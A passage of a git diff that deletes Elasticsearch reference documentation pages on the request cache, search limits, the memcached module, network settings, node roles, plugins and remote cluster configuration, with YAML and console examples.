"field": "colors" - } - } - } -} ------------------------------ -// TEST[continued] - -Requests where `size` is greater than 0 will not be cached even if the request cache is -enabled in the index settings. To cache these requests you will need to use the -query-string parameter detailed here. - -[discrete] -==== Cache key - -The whole JSON body is used as the cache key. This means that if the JSON -changes -- for instance if keys are output in a different order -- then the -cache key will not be recognised. - -TIP: Most JSON libraries support a _canonical_ mode which ensures that JSON -keys are always emitted in the same order. This canonical mode can be used in -the application to ensure that a request is always serialized in the same way. - -[discrete] -==== Cache settings - -The cache is managed at the node level, and has a default maximum size of `1%` -of the heap. 
This can be changed in the `config/elasticsearch.yml` file with: - -[source,yaml] --------------------------------- -indices.requests.cache.size: 2% --------------------------------- - -Also, you can use the +indices.requests.cache.expire+ setting to specify a TTL -for cached results, but there should be no reason to do so. Remember that -stale results are automatically invalidated when the index is refreshed. This -setting is provided for completeness' sake only. - -[discrete] -==== Monitoring cache usage - -The size of the cache (in bytes) and the number of evictions can be viewed -by index, with the <> API: - -[source,console] ------------------------- -GET /_stats/request_cache?human ------------------------- - -or by node with the <> API: - -[source,console] ------------------------- -GET /_nodes/stats/indices/request_cache?human ------------------------- diff --git a/docs/reference/modules/indices/search-settings.asciidoc b/docs/reference/modules/indices/search-settings.asciidoc deleted file mode 100644 index e35dc358cdf..00000000000 --- a/docs/reference/modules/indices/search-settings.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[[search-settings]] -=== Search settings - -The following expert settings can be set to manage global search and aggregation -limits. - -[[indices-query-bool-max-clause-count]] -`indices.query.bool.max_clause_count`:: -(<>, integer) -Maximum number of clauses a Lucene BooleanQuery can contain. Defaults to `1024`. -+ -This setting limits the number of clauses a Lucene BooleanQuery can have. The -default of 1024 is quite high and should normally be sufficient. This limit does -not only affect Elasticsearchs `bool` query, but many other queries are rewritten to Lucene's -BooleanQuery internally. The limit is in place to prevent searches from becoming too large -and taking up too much CPU and memory. In case you're considering increasing this setting, -make sure you've exhausted all other options to avoid having to do this. Higher values can lead -to performance degradations and memory issues, especially in clusters with a high load or -few resources. - -[[search-settings-max-buckets]] -`search.max_buckets`:: -(<>, integer) -Maximum number of <> allowed in -a single response. Defaults to 65,535. -+ -Requests that attempt to return more than this limit will return an error. \ No newline at end of file diff --git a/docs/reference/modules/memcached.asciidoc b/docs/reference/modules/memcached.asciidoc deleted file mode 100644 index f5a6c5e1716..00000000000 --- a/docs/reference/modules/memcached.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[modules-memcached]] -== memcached - -The memcached module allows to expose *Elasticsearch* -APIs over the memcached protocol (as closely -as possible). - -It is provided as a plugin called `transport-memcached` and installing -is explained -https://github.com/elastic/elasticsearch-transport-memcached[here] -. Another option is to download the memcached plugin and placing it -under the `plugins` directory. - -The memcached protocol supports both the binary and the text protocol, -automatically detecting the correct one to use. - -[discrete] -=== Mapping REST to Memcached Protocol - -Memcached commands are mapped to REST and handled by the same generic -REST layer in Elasticsearch. Here is a list of the memcached commands -supported: - -[discrete] -==== GET - -The memcached `GET` command maps to a REST `GET`. The key used is the -URI (with parameters). 
The main downside is the fact that the memcached -`GET` does not allow body in the request (and `SET` does not allow to -return a result...). For this reason, most REST APIs (like search) allow -to accept the "source" as a URI parameter as well. - -[discrete] -==== SET - -The memcached `SET` command maps to a REST `POST`. The key used is the -URI (with parameters), and the body maps to the REST body. - -[discrete] -==== DELETE - -The memcached `DELETE` command maps to a REST `DELETE`. The key used is -the URI (with parameters). - -[discrete] -==== QUIT - -The memcached `QUIT` command is supported and disconnects the client. - -[discrete] -=== Settings - -The following are the settings the can be configured for memcached: - -[cols="<,<",options="header",] -|=============================================================== -|Setting |Description -|`memcached.port` |A bind port range. Defaults to `11211-11311`. -|=============================================================== - -It also uses the common -<>. - -[discrete] -=== Disable memcached - -The memcached module can be completely disabled and not started using by -setting `memcached.enabled` to `false`. By default it is enabled once it -is detected as a plugin. diff --git a/docs/reference/modules/network.asciidoc b/docs/reference/modules/network.asciidoc deleted file mode 100644 index 9f63f16eaf4..00000000000 --- a/docs/reference/modules/network.asciidoc +++ /dev/null @@ -1,198 +0,0 @@ -[[modules-network]] -=== Network settings - -Elasticsearch binds to localhost only by default. This is sufficient for you -to run a local development server (or even a development cluster, if you start -multiple nodes on the same machine), but you will need to configure some -<> in order to run a real -production cluster across multiple servers. - -[WARNING] -.Be careful with the network configuration! -============================= -Never expose an unprotected node to the public internet. -============================= - -[[common-network-settings]] -==== Commonly used network settings - -`network.host`:: -(<>) -The node will bind to this hostname or IP address and _publish_ (advertise) -this host to other nodes in the cluster. Accepts an IP address, hostname, a -<>, or an array of any combination of -these. Note that any values containing a `:` (e.g., an IPv6 address or -containing one of the <>) must be -quoted because `:` is a special character in YAML. `0.0.0.0` is an acceptable -IP address and will bind to all network interfaces. The value `0` has the -same effect as the value `0.0.0.0`. -+ -Defaults to `_local_`. - -`discovery.seed_hosts`:: -(<>) -In order to join a cluster, a node needs to know the hostname or IP address of -at least some of the other nodes in the cluster. This setting provides the -initial list of addresses this node will try to contact. Accepts IP addresses -or hostnames. If a hostname lookup resolves to multiple IP addresses then each -IP address will be used for discovery. -{wikipedia}/Round-robin_DNS[Round robin DNS] -- returning a -different IP from a list on each lookup -- can be used for discovery; non- -existent IP addresses will throw exceptions and cause another DNS lookup on the -next round of pinging (subject to <>). -+ -Defaults to `["127.0.0.1", "[::1]"]`. - -`http.port`:: -(<>) -Port to bind to for incoming HTTP requests. Accepts a single value or a range. -If a range is specified, the node will bind to the first available port in the -range. -+ -Defaults to `9200-9300`. 
- -`transport.port`:: -(<>) -Port to bind for communication between nodes. Accepts a single value or a -range. If a range is specified, the node will bind to the first available port -in the range. -+ -Defaults to `9300-9400`. - -[[network-interface-values]] -==== Special values for `network.host` - -The following special values may be passed to `network.host`: - -`_local_`:: - Any loopback addresses on the system, for example `127.0.0.1`. - -`_site_`:: - Any site-local addresses on the system, for example `192.168.0.1`. - -`_global_`:: - Any globally-scoped addresses on the system, for example `8.8.8.8`. - -`_[networkInterface]_`:: - Use the addresses of the network interface called `[networkInterface]`. For - example if you wish to use the addresses of an interface called `en0` then - set `network.host: _en0_`. - -[[network-interface-values-ipv4-vs-ipv6]] -===== IPv4 vs IPv6 - -These special values will work over both IPv4 and IPv6 by default, but you can -also limit this with the use of `:ipv4` of `:ipv6` specifiers. For example, -`_en0:ipv4_` would only bind to the IPv4 addresses of interface `en0`. - -[TIP] -.Discovery in the Cloud -================================ - -More special settings are available when running in the Cloud with either the -{plugins}/discovery-ec2.html[EC2 discovery plugin] or the -{plugins}/discovery-gce-network-host.html#discovery-gce-network-host[Google Compute Engine discovery plugin] -installed. - -================================ - -[[advanced-network-settings]] -==== Advanced network settings - -The `network.host` setting explained in <> -is a shortcut which sets the _bind host_ and the _publish host_ at the same -time. In advanced used cases, such as when running behind a proxy server, you -may need to set these settings to different values: - -`network.bind_host`:: -This specifies which network interface(s) a node should bind to in order to -listen for incoming requests. A node can bind to multiple interfaces, e.g. -two network cards, or a site-local address and a local address. Defaults to -`network.host`. - -`network.publish_host`:: -The publish host is the single interface that the node advertises to other nodes -in the cluster, so that those nodes can connect to it. Currently an -Elasticsearch node may be bound to multiple addresses, but only publishes one. -If not specified, this defaults to the ``best'' address from `network.host`, -sorted by IPv4/IPv6 stack preference, then by reachability. If you set a -`network.host` that results in multiple bind addresses yet rely on a specific -address for node-to-node communication, you should explicitly set -`network.publish_host`. - -Both of the above settings can be configured just like `network.host` -- they -accept IP addresses, host names, and -<>. - -[[tcp-settings]] -===== Advanced TCP settings - -Any component that uses TCP (like the <> and -<> layers) share the following settings: - -`network.tcp.no_delay`:: -(<>) -Enable or disable the {wikipedia}/Nagle%27s_algorithm[TCP no delay] -setting. Defaults to `true`. - -`network.tcp.keep_alive`:: -(<>) -Configures the `SO_KEEPALIVE` option for this socket, which -determines whether it sends TCP keepalive probes. - -`network.tcp.keep_idle`:: -(<>) -Configures the `TCP_KEEPIDLE` option for this socket, which -determines the time in seconds that a connection must be idle before -starting to send TCP keepalive probes. Defaults to `-1`, which uses -the system default. This value cannot exceed `300` seconds. 
Only applicable on Linux and macOS, -and requires Java 11 or newer. - -`network.tcp.keep_interval`:: -(<>) -Configures the `TCP_KEEPINTVL` option for this socket, -which determines the time in seconds between sending TCP keepalive probes. -Defaults to `-1`, which uses the system default. This value cannot exceed `300` seconds. -Only applicable on Linux and macOS, and requires Java 11 or newer. - -`network.tcp.keep_count`:: -(<>) -Configures the `TCP_KEEPCNT` option for this socket, which -determines the number of unacknowledged TCP keepalive probes that may be -sent on a connection before it is dropped. Defaults to `-1`, -which uses the system default. Only applicable on Linux and macOS, and requires -Java 11 or newer. - -`network.tcp.reuse_address`:: -(<>) -Should an address be reused or not. Defaults to `true` on non-windows -machines. - -`network.tcp.send_buffer_size`:: -(<>) -The size of the TCP send buffer (specified with <>). -By default not explicitly set. - -`network.tcp.receive_buffer_size`:: -(<>) -The size of the TCP receive buffer (specified with <>). -By default not explicitly set. - -[discrete] -=== HTTP and transport network communication - -Each {es} node uses the network for two different methods of communication: - -* it exposes an <> for use by clients. - -* it exposes a <> for communication -between nodes within a cluster, for communication with a -<>, and for the -{javaclient}/transport-client.html[Java Transport client] to communicate with a -cluster. - -The network settings described above apply to both methods of communication, -and you can also configure each interface separately if needed. See the -<> and <> pages for more -details on their respective configurations. diff --git a/docs/reference/modules/node.asciidoc b/docs/reference/modules/node.asciidoc deleted file mode 100644 index 5f5dbad43d9..00000000000 --- a/docs/reference/modules/node.asciidoc +++ /dev/null @@ -1,453 +0,0 @@ -[[modules-node]] -=== Node - -Any time that you start an instance of {es}, you are starting a _node_. A -collection of connected nodes is called a <>. If you -are running a single node of {es}, then you have a cluster of one node. - -Every node in the cluster can handle <> and -<> traffic by default. The transport layer is used -exclusively for communication between nodes; the HTTP layer is used by REST -clients. -[[modules-node-description]] -// tag::modules-node-description-tag[] -All nodes know about all the other nodes in the cluster and can forward client -requests to the appropriate node. - -By default, a node is all of the following types: master-eligible, data, ingest, -and (if available) machine learning. All data nodes are also transform nodes. -// end::modules-node-description-tag[] - -TIP: As the cluster grows and in particular if you have large {ml} jobs or -{ctransforms}, consider separating dedicated master-eligible nodes from -dedicated data nodes, {ml} nodes, and {transform} nodes. - -[[node-roles]] -==== Node roles - -You can define the roles of a node by setting `node.roles`. If you don't -configure this setting, then the node has the following roles by default: - -* `master` -* `data` -* `data_content` -* `data_hot` -* `data_warm` -* `data_cold` -* `ingest` -* `ml` -* `remote_cluster_client` - -NOTE: If you set `node.roles`, the node is assigned only the roles you specify. - -<>:: - -A node that has the `master` role (default), which makes it eligible to be -<>, which controls the cluster. - -<>:: - -A node that has the `data` role (default). 
Data nodes hold data and perform data -related operations such as CRUD, search, and aggregations. A node with the `data` role can fill any of the specialised data node roles. - -<>:: - -A node that has the `ingest` role (default). Ingest nodes are able to apply an -<> to a document in order to transform and enrich the -document before indexing. With a heavy ingest load, it makes sense to use -dedicated ingest nodes and to not include the `ingest` role from nodes that have -the `master` or `data` roles. - -<>:: - -A node that has the `remote_cluster_client` role (default), which makes it -eligible to act as a remote client. By default, any node in the cluster can act -as a cross-cluster client and connect to remote clusters. - -<>:: - -A node that has `xpack.ml.enabled` and the `ml` role, which is the default -behavior in the {es} {default-dist}. If you want to use {ml-features}, there -must be at least one {ml} node in your cluster. For more information about -{ml-features}, see {ml-docs}/index.html[Machine learning in the {stack}]. -+ -IMPORTANT: If you use the {oss-dist}, do not add the `ml` role. Otherwise, the -node fails to start. - -<>:: - -A node that has the `transform` role. If you want to use {transforms}, there -be at least one {transform} node in your cluster. For more information, see -<> and <>. - -[NOTE] -[[coordinating-node]] -.Coordinating node -=============================================== - -Requests like search requests or bulk-indexing requests may involve data held -on different data nodes. A search request, for example, is executed in two -phases which are coordinated by the node which receives the client request -- -the _coordinating node_. - -In the _scatter_ phase, the coordinating node forwards the request to the data -nodes which hold the data. Each data node executes the request locally and -returns its results to the coordinating node. In the _gather_ phase, the -coordinating node reduces each data node's results into a single global -result set. - -Every node is implicitly a coordinating node. This means that a node that has -an explicit empty list of roles via `node.roles` will only act as a coordinating -node, which cannot be disabled. As a result, such a node needs to have enough -memory and CPU in order to deal with the gather phase. - -=============================================== - -[[master-node]] -==== Master-eligible node - -The master node is responsible for lightweight cluster-wide actions such as -creating or deleting an index, tracking which nodes are part of the cluster, -and deciding which shards to allocate to which nodes. It is important for -cluster health to have a stable master node. - -Any master-eligible node that is not a <> may -be elected to become the master node by the <>. - -IMPORTANT: Master nodes must have access to the `data/` directory (just like -`data` nodes) as this is where the cluster state is persisted between node -restarts. - -[[dedicated-master-node]] -===== Dedicated master-eligible node - -It is important for the health of the cluster that the elected master node has -the resources it needs to fulfill its responsibilities. If the elected master -node is overloaded with other tasks then the cluster may not operate well. In -particular, indexing and searching your data can be very resource-intensive, so -in large or high-throughput clusters it is a good idea to avoid using the -master-eligible nodes for tasks such as indexing and searching. 
You can do this -by configuring three of your nodes to be dedicated master-eligible nodes. -Dedicated master-eligible nodes only have the `master` role, allowing them to -focus on managing the cluster. While master nodes can also behave as -<> and route search and indexing requests -from clients to data nodes, it is better _not_ to use dedicated master nodes for -this purpose. - -To create a dedicated master-eligible node, set: - -[source,yaml] -------------------- -node.roles: [ master ] -------------------- - -[[voting-only-node]] -===== Voting-only master-eligible node - -A voting-only master-eligible node is a node that participates in -<> but which will not act as the cluster's -elected master node. In particular, a voting-only node can serve as a tiebreaker -in elections. - -It may seem confusing to use the term "master-eligible" to describe a -voting-only node since such a node is not actually eligible to become the master -at all. This terminology is an unfortunate consequence of history: -master-eligible nodes are those nodes that participate in elections and perform -certain tasks during cluster state publications, and voting-only nodes have the -same responsibilities even if they can never become the elected master. - -To configure a master-eligible node as a voting-only node, include `master` and -`voting_only` in the list of roles. For example to create a voting-only data -node: - -[source,yaml] -------------------- -node.roles: [ data, master, voting_only ] -------------------- - -IMPORTANT: The `voting_only` role requires the {default-dist} of {es} and is not -supported in the {oss-dist}. If you use the {oss-dist} and add the `voting_only` -role then the node will fail to start. Also note that only nodes with the -`master` role can be marked as having the `voting_only` role. - -High availability (HA) clusters require at least three master-eligible nodes, at -least two of which are not voting-only nodes. Such a cluster will be able to -elect a master node even if one of the nodes fails. - -Since voting-only nodes never act as the cluster's elected master, they may -require less heap and a less powerful CPU than the true master nodes. -However all master-eligible nodes, including voting-only nodes, require -reasonably fast persistent storage and a reliable and low-latency network -connection to the rest of the cluster, since they are on the critical path for -<>. - -Voting-only master-eligible nodes may also fill other roles in your cluster. -For instance, a node may be both a data node and a voting-only master-eligible -node. A _dedicated_ voting-only master-eligible nodes is a voting-only -master-eligible node that fills no other roles in the cluster. To create a -dedicated voting-only master-eligible node in the {default-dist}, set: - -[source,yaml] -------------------- -node.roles: [ master, voting_only ] -------------------- - -[[data-node]] -==== Data node - -Data nodes hold the shards that contain the documents you have indexed. Data -nodes handle data related operations like CRUD, search, and aggregations. -These operations are I/O-, memory-, and CPU-intensive. It is important to -monitor these resources and to add more data nodes if they are overloaded. - -The main benefit of having dedicated data nodes is the separation of the master -and data roles. 
- -To create a dedicated data node, set: -[source,yaml] ----- -node.roles: [ data ] ----- - -In a multi-tier deployment architecture, you use specialised data roles to assign data nodes to specific tiers: `data_content`,`data_hot`, -`data_warm`, or `data_cold`. A node can belong to multiple tiers, but a node that has one of the specialised data roles cannot have the -generic `data` role. - -[[data-content-node]] -==== [x-pack]#Content data node# - -Content data nodes accommodate user-created content. They enable operations like CRUD, -search and aggregations. - -To create a dedicated content node, set: -[source,yaml] ----- -node.roles: [ data_content ] ----- - -[[data-hot-node]] -==== [x-pack]#Hot data node# - -Hot data nodes store time series data as it enters {es}. The hot tier must be fast for -both reads and writes, and requires more hardware resources (such as SSD drives). - -To create a dedicated hot node, set: -[source,yaml] ----- -node.roles: [ data_hot ] ----- - -[[data-warm-node]] -==== [x-pack]#Warm data node# - -Warm data nodes store indices that are no longer being regularly updated, but are still being -queried. Query volume is usually at a lower frequency than it was while the index was in the hot tier. -Less performant hardware can usually be used for nodes in this tier. - -To create a dedicated warm node, set: -[source,yaml] ----- -node.roles: [ data_warm ] ----- - -[[data-cold-node]] -==== [x-pack]#Cold data node# - -Cold data nodes store read-only indices that are accessed less frequently. This tier uses less performant hardware and may leverage searchable snapshot indices to minimize the resources required. - -To create a dedicated cold node, set: -[source,yaml] ----- -node.roles: [ data_cold ] ----- - -[[node-ingest-node]] -==== Ingest node - -Ingest nodes can execute pre-processing pipelines, composed of one or more -ingest processors. Depending on the type of operations performed by the ingest -processors and the required resources, it may make sense to have dedicated -ingest nodes, that will only perform this specific task. - -To create a dedicated ingest node, set: - -[source,yaml] ----- -node.roles: [ ingest ] ----- - -[[coordinating-only-node]] -==== Coordinating only node - -If you take away the ability to be able to handle master duties, to hold data, -and pre-process documents, then you are left with a _coordinating_ node that -can only route requests, handle the search reduce phase, and distribute bulk -indexing. Essentially, coordinating only nodes behave as smart load balancers. - -Coordinating only nodes can benefit large clusters by offloading the -coordinating node role from data and master-eligible nodes. They join the -cluster and receive the full <>, like every other -node, and they use the cluster state to route requests directly to the -appropriate place(s). - -WARNING: Adding too many coordinating only nodes to a cluster can increase the -burden on the entire cluster because the elected master node must await -acknowledgement of cluster state updates from every node! The benefit of -coordinating only nodes should not be overstated -- data nodes can happily -serve the same purpose. - -To create a dedicated coordinating node, set: - -[source,yaml] ----- -node.roles: [ ] ----- - -[[remote-node]] -==== Remote-eligible node - -By default, any node in a cluster can act as a cross-cluster client and connect -to <>. Once connected, you can search -remote clusters using <>. You can also sync -data between clusters using <>. 
- -[source,yaml] ----- -node.roles: [ remote_cluster_client ] ----- - -[[ml-node]] -==== [xpack]#Machine learning node# - -The {ml-features} provide {ml} nodes, which run jobs and handle {ml} API -requests. If `xpack.ml.enabled` is set to `true` and the node does not have the -`ml` role, the node can service API requests but it cannot run jobs. - -If you want to use {ml-features} in your cluster, you must enable {ml} -(set `xpack.ml.enabled` to `true`) on all master-eligible nodes. If you want to -use {ml-features} in clients (including {kib}), it must also be enabled on all -coordinating nodes. If you have the {oss-dist}, do not use these settings. - -For more information about these settings, see <>. - -To create a dedicated {ml} node in the {default-dist}, set: - -[source,yaml] ----- -node.roles: [ ml ] -xpack.ml.enabled: true <1> ----- -<1> The `xpack.ml.enabled` setting is enabled by default. - -[[transform-node]] -==== [xpack]#{transform-cap} node# - -{transform-cap} nodes run {transforms} and handle {transform} API requests. If -you have the {oss-dist}, do not use these settings. For more information, see -<>. - -To create a dedicated {transform} node in the {default-dist}, set: - -[source,yaml] ----- -node.roles: [ transform ] ----- - -[[change-node-role]] -==== Changing the role of a node - -Each data node maintains the following data on disk: - -* the shard data for every shard allocated to that node, -* the index metadata corresponding with every shard allocated to that node, and -* the cluster-wide metadata, such as settings and index templates. - -Similarly, each master-eligible node maintains the following data on disk: - -* the index metadata for every index in the cluster, and -* the cluster-wide metadata, such as settings and index templates. - -Each node checks the contents of its data path at startup. If it discovers -unexpected data then it will refuse to start. This is to avoid importing -unwanted <> which can lead -to a red cluster health. To be more precise, nodes without the `data` role will -refuse to start if they find any shard data on disk at startup, and nodes -without both the `master` and `data` roles will refuse to start if they have any -index metadata on disk at startup. - -It is possible to change the roles of a node by adjusting its -`elasticsearch.yml` file and restarting it. This is known as _repurposing_ a -node. In order to satisfy the checks for unexpected data described above, you -must perform some extra steps to prepare a node for repurposing when starting -the node without the `data` or `master` roles. - -* If you want to repurpose a data node by removing the `data` role then you - should first use an <> to safely - migrate all the shard data onto other nodes in the cluster. - -* If you want to repurpose a node to have neither the `data` nor `master` roles - then it is simplest to start a brand-new node with an empty data path and the - desired roles. You may find it safest to use an - <> to migrate the shard data elsewhere - in the cluster first. - -If it is not possible to follow these extra steps then you may be able to use -the <> tool to delete any -excess data that prevents a node from starting. - -[discrete] -=== Node data path settings - -[[data-path]] -==== `path.data` - -Every data and master-eligible node requires access to a data directory where -shards and index and cluster metadata will be stored. 
The `path.data` defaults -to `$ES_HOME/data` but can be configured in the `elasticsearch.yml` config -file an absolute path or a path relative to `$ES_HOME` as follows: - -[source,yaml] ----- -path.data: /var/elasticsearch/data ----- - -Like all node settings, it can also be specified on the command line as: - -[source,sh] ----- -./bin/elasticsearch -Epath.data=/var/elasticsearch/data ----- - -TIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting -should be configured to locate the data directory outside the {es} home -directory, so that the home directory can be deleted without deleting your data! -The RPM and Debian distributions do this for you already. - -[discrete] -[[max-local-storage-nodes]] -=== `node.max_local_storage_nodes` - -The <> can be shared by multiple nodes, even by nodes from -different clusters. It is recommended however to only run one node of {es} using -the same data path. This setting is deprecated in 7.x and will be removed in -version 8.0. - -By default, {es} is configured to prevent more than one node from sharing the -same data path. To allow for more than one node (e.g., on your development -machine), use the setting `node.max_local_storage_nodes` and set this to a -positive integer larger than one. - -WARNING: Never run different node types (i.e. master, data) from the same data -directory. This can lead to unexpected data loss. - -[discrete] -[[other-node-settings]] -=== Other node settings - -More node settings can be found in <> and <>, -including: - -* <> -* <> -* <> diff --git a/docs/reference/modules/plugins.asciidoc b/docs/reference/modules/plugins.asciidoc deleted file mode 100644 index d2ea1fe675b..00000000000 --- a/docs/reference/modules/plugins.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[modules-plugins]] -== Plugins - -Plugins are a way to enhance the basic Elasticsearch functionality in a -custom manner. They range from adding custom mapping types, custom -analyzers (in a more built in fashion), custom script engines, custom discovery -and more. - -For information about selecting and installing plugins, see -{plugins}/index.html[{es} Plugins and Integrations]. - -For information about developing your own plugin, see -{plugins}/plugin-authors.html[Help for plugin authors]. diff --git a/docs/reference/modules/remote-clusters.asciidoc b/docs/reference/modules/remote-clusters.asciidoc deleted file mode 100644 index c44e81678b3..00000000000 --- a/docs/reference/modules/remote-clusters.asciidoc +++ /dev/null @@ -1,334 +0,0 @@ -[[modules-remote-clusters]] -== Remote clusters - -You can connect a local cluster to other {es} clusters, known as _remote -clusters_. Once connected, you can search remote clusters using -<>. You can also sync data between clusters -using <>. - -To register a remote cluster, connect the local cluster to nodes in the -remote cluster using one of two connection modes: - -* <> -* <> - -Your local cluster uses the <> to establish -communication with remote clusters. The coordinating nodes in the local cluster -establish <> TCP connections with specific -nodes in the remote cluster. {es} requires these connections to remain open, -even if the connections are idle for an extended period. - -You can use the <> to get -information about registered remote clusters. - -[[sniff-mode]] -[discrete] -==== Sniff mode - -In sniff mode, a cluster is created using a name and a list of seed nodes. 
When -a remote cluster is registered, its cluster state is retrieved from one of the -seed nodes and up to three _gateway nodes_ are selected as part of remote -cluster requests. This mode requires that the gateway node's publish addresses -are accessible by the local cluster. - -Sniff mode is the default connection mode. - -[[gateway-nodes-selection]] -The _gateway nodes_ selection depends on the following criteria: - -* *version*: Remote nodes must be compatible with the cluster they are -registered to, similar to the rules for -<>: -** Any node can communicate with another node on the same -major version. For example, 7.0 can talk to any 7.x node. -** Only nodes on the last minor version of a certain major version can -communicate with nodes on the following major version. In the 6.x series, 6.8 -can communicate with any 7.x node, while 6.7 can only communicate with 7.0. -** Version compatibility is -symmetric, meaning that if 6.7 can communicate with 7.0, 7.0 can also -communicate with 6.7. The following table depicts version compatibility between -local and remote nodes. -+ -[%collapsible] -.Version compatibility table -==== -// tag::remote-cluster-compatibility-matrix[] -[cols="^,^,^,^,^,^,^,^"] -|==== -| 7+^h| Local cluster -h| Remote cluster | 5.0->5.5 | 5.6 | 6.0->6.6 | 6.7 | 6.8 | 7.0 | 7.1->7.x -| 5.0->5.5 | {yes-icon} | {yes-icon} | {no-icon} | {no-icon} | {no-icon} | {no-icon} | {no-icon} -| 5.6 | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {no-icon} | {no-icon} -| 6.0->6.6 | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {no-icon} | {no-icon} -| 6.7 | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {no-icon} -| 6.8 | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} -| 7.0 | {no-icon} | {no-icon} | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} | {yes-icon} -| 7.1->7.x | {no-icon} | {no-icon} | {no-icon} | {no-icon} | {yes-icon} | {yes-icon} | {yes-icon} -|==== -// end::remote-cluster-compatibility-matrix[] -==== - -* *role*: Dedicated master nodes are never selected as gateway nodes. -* *attributes*: You can tag which nodes should be selected -(see <>), though such tagged nodes still have -to satisfy the two above requirements. - -[[proxy-mode]] -[discrete] -==== Proxy mode - -In proxy mode, a cluster is created using a name and a single proxy address. -When you register a remote cluster, a configurable number of socket connections -are opened to the proxy address. The proxy is required to route those -connections to the remote cluster. Proxy mode does not require remote cluster -nodes to have accessible publish addresses. - -The proxy mode is not the default connection mode and must be configured. Similar -to the sniff <>, the remote -connections are subject to the same version compatibility rules as -<>. - -[discrete] -[[configuring-remote-clusters]] -=== Configuring remote clusters - -You can configure remote clusters settings <>, or configure -settings <> in the -`elasticsearch.yml` file. - -[discrete] -[[configure-remote-clusters-dynamic]] -===== Dynamically configure remote clusters -Use the <> to dynamically -configure remote settings on every node in the cluster. 
For example: - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster": { - "remote": { - "cluster_one": { - "seeds": [ - "127.0.0.1:9300" - ], - "transport.ping_schedule": "30s" - }, - "cluster_two": { - "mode": "sniff", - "seeds": [ - "127.0.0.1:9301" - ], - "transport.compress": true, - "skip_unavailable": true - }, - "cluster_three": { - "mode": "proxy", - "proxy_address": "127.0.0.1:9302" - } - } - } - } -} --------------------------------- -// TEST[setup:host] -// TEST[s/127.0.0.1:9300/\${transport_host}/] - -You can dynamically update the compression and ping schedule settings. However, -you must re-include seeds or `proxy_address` in the settings update request. -For example: - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster": { - "remote": { - "cluster_one": { - "seeds": [ - "127.0.0.1:9300" - ], - "transport.ping_schedule": "60s" - }, - "cluster_two": { - "mode": "sniff", - "seeds": [ - "127.0.0.1:9301" - ], - "transport.compress": false - }, - "cluster_three": { - "mode": "proxy", - "proxy_address": "127.0.0.1:9302", - "transport.compress": true - } - } - } - } -} --------------------------------- -// TEST[continued] - -NOTE: When the compression or ping schedule settings change, all the existing -node connections must close and re-open, which can cause in-flight requests to -fail. - -You can delete a remote cluster from the cluster settings by passing `null` -values for each remote cluster setting: - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster": { - "remote": { - "cluster_two": { <1> - "mode": null, - "seeds": null, - "skip_unavailable": null, - "transport": { - "compress": null - } - } - } - } - } -} --------------------------------- -// TEST[continued] - -<1> `cluster_two` would be removed from the cluster settings, leaving -`cluster_one` and `cluster_three` intact. - -[discrete] -[[configure-remote-clusters-static]] -===== Statically configure remote clusters -If you specify settings in `elasticsearch.yml` files, only the nodes with -those settings can connect to the remote cluster and serve remote cluster requests. For example: - -[source,yaml] --------------------------------- -cluster: - remote: - cluster_one: <1> - seeds: 127.0.0.1:9300 <2> - transport.ping_schedule: 30s <3> - cluster_two: <1> - mode: sniff <4> - seeds: 127.0.0.1:9301 <2> - transport.compress: true <5> - skip_unavailable: true <6> - cluster_three: <1> - mode: proxy <4> - proxy_address: 127.0.0.1:9302 <7> - --------------------------------- -<1> `cluster_one`, `cluster_two`, and `cluster_three` are arbitrary _cluster aliases_ -representing the connection to each cluster. These names are subsequently used to -distinguish between local and remote indices. -<2> The hostname and <> port (default: 9300) of a -seed node in the remote cluster. -<3> A keep-alive ping is configured for `cluster_one`. -<4> The configured connection mode. By default, this is <>, so -the mode is implicit for `cluster_one`. However, it can be explicitly configured -as demonstrated by `cluster_two` and must be explicitly configured for -<> as demonstrated by `cluster_three`. -<5> Compression is explicitly enabled for requests to `cluster_two`. -<6> Disconnected remote clusters are optional for `cluster_two`. -<7> The address for the proxy endpoint used to connect to `cluster_three`. 
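-
-Whichever way the connections are configured, you can confirm that the remote
-clusters registered above are reachable with the remote cluster info API
-mentioned earlier. A minimal check, assuming the `cluster_one`, `cluster_two`,
-and `cluster_three` aliases from the examples above, looks like this:
-
-[source,console]
---------------------------------
-GET _remote/info
---------------------------------
-
-The response lists each configured alias together with its connection mode,
-the seed or proxy address in use, and whether the connection is currently
-established.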
- -[discrete] -[[remote-cluster-settings]] -=== Global remote cluster settings - -These settings apply to both <> and -<>. <> -and <> are described -separately. - -`cluster.remote..mode`:: - The mode used for a remote cluster connection. The only supported modes are - `sniff` and `proxy`. - -`cluster.remote.initial_connect_timeout`:: - - The time to wait for remote connections to be established when the node - starts. The default is `30s`. - -`node.remote_cluster_client`:: - - By default, any node in the cluster can act as a cross-cluster client and - connect to remote clusters. The `node.remote_cluster_client` setting can be - set to `false` (defaults to `true`) to prevent certain nodes from connecting - to remote clusters. Remote cluster requests must be sent to a node that is - allowed to act as a cross-cluster client. - -`cluster.remote..skip_unavailable`:: - - Per cluster boolean setting that allows to skip specific clusters when no - nodes belonging to them are available and they are the target of a remote - cluster request. Default is `false`, meaning that all clusters are mandatory - by default, but they can selectively be made optional by setting this setting - to `true`. - -`cluster.remote..transport.ping_schedule`:: - - Sets the time interval between regular application-level ping messages that - are sent to ensure that transport connections to nodes belonging to remote - clusters are kept alive. If set to `-1`, application-level ping messages to - this remote cluster are not sent. If unset, application-level ping messages - are sent according to the global `transport.ping_schedule` setting, which - defaults to `-1` meaning that pings are not sent. - -`cluster.remote..transport.compress`:: - - Per cluster boolean setting that enables you to configure compression for - requests to a specific remote cluster. This setting impacts only requests - sent to the remote cluster. If the inbound request is compressed, - Elasticsearch compresses the response. If unset, the global - `transport.compress` is used as the fallback setting. 